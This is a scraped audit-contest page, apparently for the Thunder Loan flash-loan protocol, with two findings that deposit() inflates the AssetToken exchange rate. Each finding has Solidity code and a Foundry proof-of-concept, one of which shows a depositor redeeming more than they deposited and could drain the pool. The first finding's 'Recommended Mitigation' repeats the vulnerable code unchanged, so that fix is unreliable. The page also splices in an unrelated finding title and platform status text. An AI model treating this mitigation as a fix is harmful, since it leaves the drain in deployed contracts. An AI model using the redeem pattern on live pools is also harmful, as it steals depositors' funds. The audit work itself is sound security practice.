deposit() Calls updateExchangeRate() With a Phantom Fee on Every Deposit, Inflating the Exchange Rate Without Any Flash Loan Income
Description
The exchange rate of an AssetToken represents underlying value per share and should increase only when flash loan fees are collected. ThunderLoan.deposit()
incorrectly calls assetToken.updateExchangeRate(calculatedFee) before the token transfer occurs, treating the deposited amount as if it were a borrowed flash
loan amount generating a real fee.
No fee income actually enters the protocol during a deposit — the amount used to compute calculatedFee is just being deposited, not borrowed. The exchange rate
rises artificially with every deposit, which means each subsequent depositor's mintAmount is divided by a higher-than-true exchange rate, giving them fewer
shares than they are owed.
ThunderLoanUpgraded.deposit() removes this call entirely, confirming it is a known bug.
// ThunderLoan.sol
function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {
AssetToken assetToken = s_tokenToAssetToken[token];
uint256 exchangeRate = assetToken.getExchangeRate();
uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate;
emit Deposit(msg.sender, token, amount);
assetToken.mint(msg.sender, mintAmount);
// @> calculates fee as if amount were a flash loan — it is not
uint256 calculatedFee = getCalculatedFee(token, amount);
// @> exchange rate inflated with no real fee income
assetToken.updateExchangeRate(calculatedFee);
token.safeTransferFrom(msg.sender, address(assetToken), amount);
}
// ThunderLoanUpgraded.sol — correctly fixed:
function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {
AssetToken assetToken = s_tokenToAssetToken[token];
uint256 exchangeRate = assetToken.getExchangeRate();
uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate;
emit Deposit(msg.sender, token, amount);
assetToken.mint(msg.sender, mintAmount);
// @> no updateExchangeRate call — this is the correct behavior
token.safeTransferFrom(msg.sender, address(assetToken), amount);
}
Risk
Likelihood:
Every call to ThunderLoan.deposit() triggers the inflated exchange rate update — no special conditions required
The inflation compounds with each deposit, growing worse over time as more LPs deposit
Impact:
Later depositors receive fewer AssetTokens than their proportional share of the pool, meaning they will redeem less underlying than they deposited
Early depositors are unfairly enriched at the expense of later depositors, breaking LP fairness guarantees
Proof of Concept
function testDepositUpdatesExchangeRateIncorrectly() public {
vm.prank(thunderLoan.owner());
thunderLoan.setAllowedToken(tokenA, true);
AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA);
vm.startPrank(liquidityProvider);
tokenA.mint(liquidityProvider, AMOUNT);
tokenA.approve(address(thunderLoan), AMOUNT);
thunderLoan.deposit(tokenA, AMOUNT);
vm.stopPrank();
uint256 rateBefore = assetToken.getExchangeRate();
// rateBefore = 1003000000000000000 (already inflated from first deposit)
// Second deposit — no flash loan occurred, exchange rate should not change
vm.startPrank(attacker);
tokenA.mint(attacker, AMOUNT);
tokenA.approve(address(thunderLoan), AMOUNT);
thunderLoan.deposit(tokenA, AMOUNT);
vm.stopPrank();
uint256 rateAfter = assetToken.getExchangeRate();
// rateAfter = 1004506... — increased with zero fee income
assertGt(rateAfter, rateBefore); // PASSES — rate wrongly inflated
}
Recommended Mitigation
// ThunderLoan.sol
function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {
AssetToken assetToken = s_tokenToAssetToken[token];
uint256 exchangeRate = assetToken.getExchangeRate();
uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate;
emit Deposit(msg.sender, token, amount);
assetToken.mint(msg.sender, mintAmount);
uint256 calculatedFee = getCalculatedFee(token, amount);
assetToken.updateExchangeRate(calculatedFee);
token.safeTransferFrom(msg.sender, address(assetToken), amount);
}
Title: Flash Loan Repayment Check Only Validates Token Balance — deposit() Satisfies It, Letting Attackers Mint Redeemable AssetTokens Instead of Truly Repaying
Impact: High
Scope: …/protocol/ThunderLoan.sol
Lead Judging Commences
[H-02] Updating exchange rate on token deposit will inflate asset token's exchange rate faster than expected
# Summary Exchange rate for asset token is updated on deposit. This means users can deposit (which will increase exchange rate), and then immediately withdraw more underlying tokens than they deposited. # Details Per documentation: > Liquidity providers can deposit assets into ThunderLoan and be given AssetTokens in return. **These AssetTokens gain interest over time depending on how often people take out flash loans!** Asset tokens gain interest when people take out flash loans with the underlying tokens. In current version of ThunderLoan, exchange rate is also updated when user deposits underlying tokens. This does not match with documentation and will end up causing exchange rate to increase on deposit. This will allow anyone who deposits to immediately withdraw and get more tokens back than they deposited. Underlying of any asset token can be completely drained in this manner. # Filename `src/protocol/ThunderLoan.sol` # Permalinks https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L153-L154 # Impact Users can deposit and immediately withdraw more funds. Since exchange rate is increased on deposit, they will withdraw more funds then they deposited without any flash loans being taken at all. # Recommendations It is recommended to not update exchange rate on deposits and updated it only when flash loans are taken, as per documentation. ```diff function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) { AssetToken assetToken = s_tokenToAssetToken[token]; uint256 exchangeRate = assetToken.getExchangeRate(); uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate; emit Deposit(msg.sender, token, amount); assetToken.mint(msg.sender, mintAmount); - uint256 calculatedFee = getCalculatedFee(token, amount); - assetToken.updateExchangeRate(calculatedFee); token.safeTransferFrom(msg.sender, address(assetToken), amount); } ``` # POC ```solidity function testExchangeRateUpdatedOnDeposit() public setAllowedToken { tokenA.mint(liquidityProvider, AMOUNT); tokenA.mint(user, AMOUNT); // deposit some tokenA into ThunderLoan vm.startPrank(liquidityProvider); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); // another user also makes a deposit vm.startPrank(user); tokenA.approve(address(thunderLoan), AMOUNT); thunderLoan.deposit(tokenA, AMOUNT); vm.stopPrank(); AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA); // after a deposit, asset token's exchange rate has aleady increased // this is only supposed to happen when users take flash loans with underlying assertGt(assetToken.getExchangeRate(), 1 * assetToken.EXCHANGE_RATE_PRECISION()); // now liquidityProvider withdraws and gets more back because exchange // rate is increased but no flash loans were taken out yet // repeatedly doing this could drain all underlying for any asset token vm.startPrank(liquidityProvider); thunderLoan.redeem(tokenA, assetToken.balanceOf(liquidityProvider)); vm.stopPrank(); assertGt(tokenA.balanceOf(liquidityProvider), AMOUNT); } ```
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Judging
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsRewards Distribution
The contest is complete and the rewards are being distributed.